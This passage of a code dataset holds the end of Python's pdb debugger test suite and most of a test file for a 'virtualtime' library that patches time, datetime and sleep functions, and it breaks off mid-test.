> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
file_content = textwrap.dedent(file_content)
with open(support.TESTFN, 'w') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function('', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bar():
pass
def quux():
pass
""",
'bar',
('bar', 4),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn("NameError: name 'invalid' is not defined",
stdout.decode())
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
test_virtualtime.py
|
#!/usr/bin/env python
import virtualtime
from virtualtime import datetime_tz
from virtualtime.datetime_tz import test_datetime_tz
import datetime
import time
import pytz
import pickle
import os
import subprocess
import sys
import decorator
import threading
import logging
import datetime
from nose.plugins.attrib import attr
def outside(code_str, *import_modules):
"""Runs a code string in a separate process, pickles the result, and returns it"""
import_modules_str = 'import %s' % ', '.join(import_modules) if import_modules else ''
command_string = 'import sys, pickle; sys.path = pickle.loads(sys.stdin.read()); %s; sys.stdout.write(pickle.dumps(%s))' % (import_modules_str, code_str)
pickle_path = pickle.dumps(sys.path)
p = subprocess.Popen([sys.executable, "-c", command_string], stdin=subprocess.PIPE, stdout=subprocess.PIPE, env=os.environ)
results, errors = p.communicate(pickle_path)
if errors and errors.strip():
raise ValueError(errors)
return pickle.loads(results)
@decorator.decorator
def restore_time_after(test_function, *args, **kwargs):
try:
return test_function(*args, **kwargs)
finally:
virtualtime.restore_time()
@restore_time_after
def check_real_time_function(time_function, code_str, *import_modules):
"""Generic test for a linear time function that can be run by a spawned python process too"""
first_time = time_function()
time.sleep(0.1)
outside_time = outside(code_str, *import_modules)
time.sleep(0.1)
second_time = time_function()
assert first_time < outside_time < second_time
@restore_time_after
def run_time_function_tst(time_function, set_function, diff, enabled=True):
"""Generic test for time_function and a set_function that can move the return of that time_function forwards or backwards by diff
Checks that the right thing will happen when virtualtime enabled/disabled"""
first_time = time_function()
set_function(first_time + diff)
late_time = time_function()
set_function(first_time - diff)
early_time = time_function()
virtualtime.restore_time()
last_time = time_function()
if enabled:
assert early_time < first_time < last_time < late_time
else:
assert first_time <= late_time <= early_time <= last_time
@restore_time_after
def run_time_derived_function_tst(derived_function, time_function, set_function, diff, min_diff=None, enabled=True):
"""Generic test for time_function and a set_function that can move the return of that time_function forwards or backwards by diff
Checks that the right thing will happen when virtualtime enabled/disabled"""
first_derived, first_time = derived_function(), time_function()
set_function(first_time + diff)
late_derived = derived_function()
set_function(first_time - diff)
early_derived = derived_function()
virtualtime.restore_time()
if min_diff:
time.sleep(min_diff)
last_derived = derived_function()
if enabled:
assert early_derived < first_derived < last_derived < late_derived
else:
assert first_derived <= late_derived <= early_derived <= last_derived
def order_preserving_timestr_reslice(s):
"""Changes the Python format for asctime/ctime 'Sat Jun 06 16:26:11 1998' to '1998-06-06 16:26:11' so that it always increases over time"""
month_table = "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"
s = s.replace(" ", "0")
y, m, d, t = int(s[-4:]), month_table.index(s[4:7]), int(s[8:10]), s[11:19]
return "%04d-%02d-%02d %s" % (y, m, d, t)
class RunUnpatched(object):
"""Base class for tests that should all be run with virtualtime disabled"""
@classmethod
def setup_class(cls):
"""Ensure that virtualtime is disabled when running these tests"""
cls.virtual_time_enabled = virtualtime.enabled()
assert not virtualtime.enabled()
@classmethod
def teardown_class(cls):
"""Ensure that virtualtime is disabled after running these tests"""
del cls.virtual_time_enabled
assert not virtualtime.enabled()
class RunPatched(object):
"""Base class for tests that should all be run with virtualtime enabled"""
@classmethod
def setup_class(cls):
"""Ensure that virtualtime is disabled before, then enabled when running these tests"""
assert not virtualtime.enabled()
virtualtime.enable()
cls.virtual_time_enabled = virtualtime.enabled()
assert cls.virtual_time_enabled
@classmethod
def teardown_class(cls):
"""Ensure that virtualtime was enabled when running these tests, but disabled after"""
del cls.virtual_time_enabled
assert virtualtime.enabled()
virtualtime.disable()
assert not virtualtime.enabled()
def setup_method(self, method): # This is a wrapper of setUp for py.test (py.test and nose take different method setup methods)
self.setUp()
def setUp(self):
"""Restores normal time to ensure tests start cleanly"""
virtualtime.restore_time()
def teardown_method(self, method): # This is a wrapper of tearDown for py.test (py.test and nose take different method setup methods)
self.tearDown()
def tearDown(self):
"""Restores normal time after the method has finished"""
virtualtime.restore_time()
class TestPartialPatching(object):
@classmethod
def setup_class(cls):
virtualtime.disable()
def test_correspondence(self):
"""Checks that patching time and datetime modules independently works"""
start_time, start_date = time.time(), datetime.datetime.now()
virtualtime.patch_time_module()
second_time, second_date = time.time(), datetime.datetime.now()
assert 0 <= second_time - start_time <= 0.05
assert datetime.timedelta(0) <= second_date - start_date <= datetime.timedelta(seconds=0.05)
virtualtime.set_offset(3600)
half_time, half_date = time.time(), datetime.datetime.now()
assert 3600 <= half_time - start_time <= 3600.1
# datetime is not patched yet
assert datetime.timedelta(seconds=0) <= half_date - start_date <= datetime.timedelta(seconds=0.1)
virtualtime.patch_datetime_module()
whole_time, whole_date = time.time(), datetime.datetime.now()
assert 3600 <= whole_time - start_time <= 3600.1
assert datetime.timedelta(seconds=3600) <= whole_date - start_date <= datetime.timedelta(seconds=3600.1)
virtualtime.unpatch_time_module()
other_half_time, other_half_date = time.time(), datetime.datetime.now()
assert 0 <= other_half_time - start_time <= 0.1
assert datetime.timedelta(seconds=3600) <= other_half_date - start_date <= datetime.timedelta(seconds=3600.1)
@classmethod
def teardown_class(cls):
virtualtime.disable()
class RealTimeBase(object):
"""Tests for real time functions"""
def test_time(self):
"""tests that real time is still happening in the time.time() function"""
check_real_time_function(time.time, "time.time()", "time")
def test_datetime_now(self):
"""tests that real time is still happening in the datetime module"""
check_real_time_function(datetime.datetime.now, "datetime.datetime.now()", "datetime")
def test_datetime_now_with_tz(self):
"""tests that real time is still happening in the datetime module"""
def f():
return datetime.datetime.now(pytz.timezone('Africa/Johannesburg'))
check_real_time_function(f, "datetime.datetime.now(pytz.timezone('Africa/Johannesburg'))", "datetime", "pytz")
def test_datetime_utcnow(self):
"""tests that real time is still happening in the datetime module"""
check_real_time_function(datetime.datetime.utcnow, "datetime.datetime.utcnow()", "datetime")
def test_datetime_tz_now(self):
"""tests that real time is still happening in the datetime_tz module"""
check_real_time_function(datetime_tz.datetime_tz.now, "virtualtime.datetime_tz.datetime_tz.now()", "virtualtime.datetime_tz")
def test_datetime_tz_utcnow(self):
"""tests that real time is still happening in the datetime_tz module"""
check_real_time_function(datetime_tz.datetime_tz.utcnow, "virtualtime.datetime_tz.datetime_tz.utcnow()", "virtualtime.datetime_tz")
class TestUnpatchedRealTime(RealTimeBase, RunUnpatched):
"""Tests for real time functions when virtualtime is disabled"""
class TestPatchedRealTime(RealTimeBase, RunPatched):
"""Tests for real time functions when virtualtime is enabled"""
class TestTimeNotification(RunPatched):
"""Tests the different notification events that happen when virtualtime is adjusted"""
def test_notify_on_change(self):
self.notify_event = threading.Event()
virtualtime.notify_on_change(self.notify_event)
start_time = virtualtime._original_time()
virtualtime.set_offset(1)
assert self.notify_event.wait(0.1)
self.notify_event.clear()
offset_time = virtualtime._original_time()
assert offset_time - start_time < 0.1
virtualtime.set_time(0)
assert self.notify_event.wait(0.1)
self.notify_event.clear()
set_time = virtualtime._original_time()
assert set_time - offset_time < 0.1
virtualtime.restore_time()
assert self.notify_event.wait(0.1)
self.notify_event.clear()
restore_time = virtualtime._original_time()
assert restore_time - set_time < 0.1
def callback_thread(self):
"""Repeatedly sets the target event whilst recording the offsets"""
while not self.callback_stop:
if self.notify_event.wait(5):
if self.callback_stop:
break
self.callback_logs.append((virtualtime._original_time(), virtualtime._time_offset, self.callback_event.is_set()))
self.notify_event.clear()
self.callback_event.set()
elif not self.callback_stop:
self.callback_missed.append((virtualtime._original_time(), virtualtime._time_offset))
def test_callback(self):
self.notify_event = threading.Event()
virtualtime.notify_on_change(self.notify_event)
self.callback_stop = False
self.callback_event = threading.Event()
self.callback_logs = []
self.callback_missed = []
ct = threading.Thread(target=self.callback_thread)
ct.start()
virtualtime.wait_for_callback_on_change(self.callback_event)
try:
start_time = virtualtime._original_time()
virtualtime.set_offset(1)
assert len(self.callback_logs) == 1 and not self.callback_missed
assert self.callback_logs[0][1:] == (1, False)
offset_time = virtualtime._original_time()
assert offset_time - start_time < 0.1
virtualtime.set_time(0)
assert len(self.callback_logs) == 2 and not self.callback_missed
assert self.callback_logs[1][1] < -start_time + 1 and self.callback_logs[1][2] is False
set_time = virtualtime._original_time()
assert set_time - offset_time < 0.1
virtualtime.restore_time()
assert len(self.callback_logs) == 3 and not self.callback_missed
assert self.callback_logs[1][1] < -start_time + 1 and self.callback_logs[1][2] is False
restore_time = virtualtime._original_time()
assert restore_time - set_time < 0.1
finally:
# deleting this should ensure it drops out of the weak set and doesn't hang things up later...
del self.callback_event
self.callback_stop = True
self.notify_event.set()
ct.join()
class VirtualTimeBase(object):
"""Tests for virtual time functions when virtualtime is enabled"""
def test_datetime_init(self):
"""tests the basic instantiation of datetime objects."""
datetime.datetime(2012, 7, 25) # Richardg's birthday...hooray
datetime.datetime(year=2012, month=7, day=25, hour=10, minute=27, second=3, microsecond=100, tzinfo=pytz.timezone('Africa/Johannesburg'))
# test args, kwargs
args = (2012,7,25)
kwargs = {'hour':10, 'minute':27, 'second':3}
kwargs_only = {'year':2012, 'month':7, 'day': 25, 'hour':10, 'minute':27, 'second':3, 'microsecond':100, 'tzinfo': pytz.timezone('Africa/Johannesburg')}
datetime.datetime(*args)
datetime.datetime(*args, **kwargs)
datetime.datetime(**kwargs_only)
def test_time(self):
"""tests that we can set time"""
run_time_function_tst(time.time, virtualtime.set_time, 100, enabled=self.virtual_time_enabled)
def test_localtime(self):
"""tests that we can set time and it affects localtime"""
run_time_derived_function_tst(time.localtime, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_gmtime(self):
"""tests that we can set time and it affects gmtime"""
run_time_derived_function_tst(time.gmtime, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_asctime(self):
"""tests that we can set time and it affects asctime"""
order_preserving_asctime = lambda: order_preserving_timestr_reslice(time.asctime())
run_time_derived_function_tst(order_preserving_asctime, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_ctime(self):
"""tests that we can set time and it affects ctime"""
order_preserving_ctime = lambda: order_preserving_timestr_reslice(time.ctime())
run_time_derived_function_tst(order_preserving_ctime, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_strftime(self):
"""tests that we can set time and it affects ctime"""
strftime_iso = lambda: time.strftime("%Y-%m-%d %H:%M:%S")
run_time_derived_function_tst(strftime_iso, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_datetime_now(self):
"""tests that setting time and datetime are both possible"""
run_time_function_tst(datetime.datetime.now, virtualtime.set_local_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
def test_datetime_utcnow(self):
"""tests that setting time and datetime are both possible"""
run_time_function_tst(datetime.datetime.utcnow, virtualtime.set_utc_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
def test_datetime_tz_now(self):
"""tests that setting time and datetime are both possible"""
run_time_function_tst(datetime_tz.datetime_tz.now, virtualtime.set_local_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
def test_datetime_tz_utcnow(self):
"""tests that setting time and datetime are both possible"""
run_time_function_tst(datetime_tz.datetime_tz.utcnow, virtualtime.set_utc_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
def test_datetime_tz_now_other_tz(self):
"""tests that setting time and datetime are both possible"""
for tz_name in ["Asia/Tokyo", "Europe/London", "America/Chicago"]:
tz = pytz.timezone(tz_name)
tz_now = lambda: datetime_tz.datetime_tz.now().astimezone(tz)
run_time_derived_function_tst(tz_now, datetime_tz.datetime_tz.utcnow, virtualtime.set_utc_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
class TestDisabledVirtualTime(VirtualTimeBase, RunUnpatched):
"""Tests that virtual time functions have no effect when VirtualTime is disabled"""
class TestVirtualTime(VirtualTimeBase, RunPatched):
"""Tests that virtual time functions have no effect when VirtualTime is disabled"""
class SleepBase(object):
def setup_method(self, method): # This is a wrapper of setUp for py.test (py.test and nose take different method setup methods)
self.setUp()
def setUp(self):
self.initial_waiter_count = len(virtualtime._virtual_time_state._Condition__waiters)
def teardown_method(self, method): # This is a wrapper of tearDown for py.test (py.test and nose take different method setup methods)
self.tearDown()
def tearDown(self):
del self.initial_waiter_count
def wait_sleep_started(self, sleep_count, max_wait=5.0):
"""Waits for the given number of sleeps to start before continuing (with a timeout)"""
if not self.virtual_time_enabled:
return
start_wait_check = virtualtime._original_time()
while len(virtualtime._virtual_time_state._Condition__waiters) < self.initial_waiter_count + sleep_count:
virtualtime._original_sleep(0.001)
delay = virtualtime._original_time() - start_wait_check
if delay > max_wait:
raise ValueError("Not enough sleepers started waiting in time...")
@restore_time_after
def test_sleep(self):
"""Tests that sleep comes back quicker than normal when time is advanced"""
first_time = time.time()
sleeper_thread = threading.Thread(target=time.sleep, args=(3,), name="test_sleep_sleeper")
sleeper_thread.start()
self.wait_sleep_started(1, 0.2)
virtualtime.set_time(first_time + 5)
sleeper_thread.join()
virtualtime.restore_time()
join_time = time.time()
if self.virtual_time_enabled:
assert join_time - first_time < 0.5
else:
assert join_time - first_time >= 3
@restore_time_after
def test_parallel_sleeps(self):
"""Tests that sleep comes back quicker than normal when time is advanced, and that this works with lots of threads"""
first_time = virtualtime._original_time()
sleeper_threads = {}
REPEATS = 100
for n in range(REPEATS):
sleeper_threads[n] = sleeper_thread = threading.Thread(target=time.sleep, args=(3,), name="test_sleep_sleeper_%d" % n)
sleeper_thread.start()
self.wait_sleep_started(REPEATS, 0.5)
thread_time = virtualtime._original_time()
setup_duration = thread_time - first_time
assert setup_duration < 0.5
virtualtime.set_time(thread_time + 20)
for n in range(REPEATS):
sleeper_threads[n].join()
join_time = virtualtime._original_time()
sleep_duration = join_time - thread_time
virtualtime.restore_time()
if self.virtual_time_enabled:
assert sleep_duration < 0.2
else:
assert sleep_duration >= 3
class TestDisabledSleep(SleepBase, RunUnpatched):
pass
class TestSleep(SleepBase, RunPatched):
@attr('long_running')
def test_many_parallel_sleeps(self):
"""Tests that sleep comes back quicker than normal when time is advanced, and that this works with lots of threads when repeated many times"""
LOOPS = 100
for m in range(LOOPS):
self.test_parallel_sleeps()
class TestFastForward(RunPatched):
def fast_forward_catcher(self, event, msg_dict):
offsets = msg_dict['offsets']
while "stop" not in msg_dict:
event.wait()
offsets.append(virtualtime._time_offset)
event.clear()
@restore_time_after
def test_fast_forward_time(self):
"""Test that fast forwarding the time works properly"""
event = threading.Event()
virtualtime.notify_on_change(event)
offsets = []
msg_dict = {'offsets': offsets}
catcher_thread = threading.Thread(target=self.fast_forward_catcher, args=(event, msg_dict))
catcher_thread.start()
start_time = virtualtime._original_time()
virtualtime.fast_forward_time(1)
assert virtualtime._time_offset == 1
virtualtime.fast_forward_time(2.5)
assert virtualtime._time_offset == 3.5
virtualtime.fast_forward_time(target=start_time + 9.1, step_size=2.0)
assert 9 <= virtualtime._time_offset <= 9.2
virtualtime.restore_time()
virtualtime.fast_forward_time(-1.3, step_size=0.9)
virtualtime.restore_time()
msg_dict['stop'] = True
event.set()
catcher_thread.join()
assert offsets[:6] == [1.0, 2.0, 3.0, 3.5, 5.5, 7.5]
assert 9 <= offsets[6] <= 9.2
assert offsets[7:11] == [0, -0.9, -1.3, 0]
# depends on how long the stop event takes?
assert (not offsets[11:]) or offsets[11:] == [0]
@attr('long_running')
@restore_time_after
def test_fast_forward_time_long(self):
"""Test that fast forwarding the time a long way works properly"""
event = threading.Event()
virtualtime.notify_on_change(event)
offsets = []
msg_dict = {'offsets': offsets}
catcher_thread = threading.Thread(target=self.fast_forward_catcher, args=(event, msg_dict))
catcher_thread.start()
start_time = virtualtime._original_time()
virtualtime.fast_forward_time(1000, step_size=1)
virtualtime.restore_time()
msg_dict['stop'] = True
event.set()
catcher_thread.join()
assert offsets == range(1, 1001) + [0]
@restore_time_after
def test_fast_forward_datetime_style(self):
"""Test that fast forwarding the time works properly when using datetime-style objects"""
event = threading.Event()
virtualtime.notify_on_change(event)
offsets = []
msg_dict = {'offsets': offsets}
catcher_thread = threading.Thread(target=self.fast_forward_catcher, args=(event, msg_dict))
catcher_thread.start()
start_time = virtualtime._original_datetime_now()
utc_start_time = datetime_tz.localize(start_time).astimezone(pytz.utc)
virtualtime.fast_forward_timedelta(datetime.timedelta(seconds=1))
assert virtualtime._time_offset == 1
virtualtime.fast_forward_timedelta(datetime.timedelta(seconds=2.5))
assert virtualtime._time_offset == 3.5
virtualtime.fast_forward_local_datetime(target=start_time + datetime.timedelta(seconds=9.1), step_size=datetime.timedelta(seconds=2.0))
assert 9 <= virtualtime._time_offset <= 9.2
virtualtime.fast_forward_utc_datetime(target=utc_start_time + datetime.timedelta(seconds=18.2), step_size=datetime.timedelta(seconds=20.0))
assert 18 <= virtualtime._time_offset <= 18.3
virtualtime.restore_time()
virtualtime.fast_forward_timedelta(datetime.timedelta(seconds=-1.3), step_size=datetime.timedelta(seconds=0.9))
virtualtime.restore_time()
msg_dict['stop'] = True
event.set()
catcher_thread.join()
assert offsets[:6] == [1.0, 2.0, 3.0, 3.5, 5.5, 7.5]
assert 9 <= offsets[6] <= 9.2
assert 18 <= offsets[7] <= 18.3
assert offsets[8:12] == [0, -0.9, -1.3, 0]
# depends on how long the stop event takes?
assert (not offsets[12:]) or offsets[12:] == [0]
def fast_forward_delayer(self, notify_event, delay_event, msg_dict):
offsets = msg_dict['offsets']
positions = msg_dict['positions']
while "stop" not in msg_dict:
notify_event.wait()
offsets.append(virtualtime._time_offset)
position = positions.pop(0) if positions else ""
if position == "start_job":
virtualtime.delay_fast_forward_until_set(delay_event)
virtualtime._original_sleep(0.1)
delay_event.set()
notify_event.clear()
@restore_time_after
def test_fast_forward_delay(self):
"""Test that fast forwarding the time works properly"""
notify_event = threading.Event()
virtualtime.notify_on_change(notify_event)
delay_event = threading.Event()
offsets = []
positions = ["start_job", ""]
msg_dict = {'offsets': offsets, 'positions': positions}
catcher_thread = threading.Thread(target=self.fast_forward_delayer, args=(notify_event, delay_event, msg_dict))
catcher_thread.start()
start_time = virtualtime._original_time()
virtualtime.fast_forward_time(2)
assert virtualtime._time_offset == 2
virtualtime.restore_time()
msg_dict['stop'] = True
notify_event.set()
catcher_thread.join()
completion_time = virtualtime._original_time()
assert offsets[:3] == [1.0, 2.0, 0]
# depends on how long the stop event takes?
assert (not offsets[3:]) or offsets[3:] == [0]
assert completion_time - start_time < 0.2
assert delay_event.is_set()
class TestInheritance(object):
"""Tests how detection of inheritance works for datetime classes"""
def setup_method(self, method): # This is a wrapper of setUp for py.test (py.test and nose take different method setup methods)
"""Ensure that virtualtime is disabled when starting each test"""
self.setUp()
def setUp(self):
while virtualtime.enabled():
virtualtime.disable()
def teardown_method(self, method): # This is a wrapper of tearDown for py.test (py.test and nose take different method setup methods)
self.tearDown()
def tearDown(self):
"""Ensure that virtualtime is disabled after running each test"""
while virtualtime.enabled():
virtualtime.disable()
def test_disabled(self):
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
def test_enabled(self):
virtualtime.enable()
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
def test_switching(self):
orig_datetime = datetime.datetime
class derived_datetime(datetime.datetime):
pass
assert issubclass(datetime_tz.datetime_tz, orig_datetime)
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
assert issubclass(derived_datetime, orig_datetime)
assert issubclass(derived_datetime, datetime.datetime)
virtualtime.enable()
class derived_datetime2(datetime.datetime):
pass
assert issubclass(datetime_tz.datetime_tz, orig_datetime)
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
assert issubclass(derived_datetime, orig_datetime)
assert issubclass(derived_datetime, datetime.datetime)
assert issubclass(derived_datetime2, orig_datetime)
assert issubclass(derived_datetime2, datetime.datetime)
virtualtime.disable()
assert issubclass(datetime_tz.datetime_tz, orig_datetime)
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
assert issubclass(derived_datetime, orig_datetime)
assert issubclass(derived_datetime, datetime.datetime)
assert issubclass(derived_datetime2, orig_datetime)
assert issubclass(derived_datetime2, datetime.datetime)
def test_switching_values(self):
now = datetime_tz.datetime_tz.now()
assert isinstance(now, datetime.datetime)
assert isinstance(now, datetime_tz.datetime_tz)
later = now + datetime.timedelta(hours=1)
assert isinstance(later, datetime.datetime)
assert isinstance(later, datetime_tz.datetime_tz)
start = datetime.datetime.combine(now.date(), now.time())
assert isinstance(start, datetime.datetime)
local_start = datetime_tz.localize(start)
assert local_start == now
assert isinstance(local_start, datetime_tz.datetime_tz)
start_tz = datetime_tz.datetime_tz.combine(now.date(), now.time(), datetime_tz.localtz())
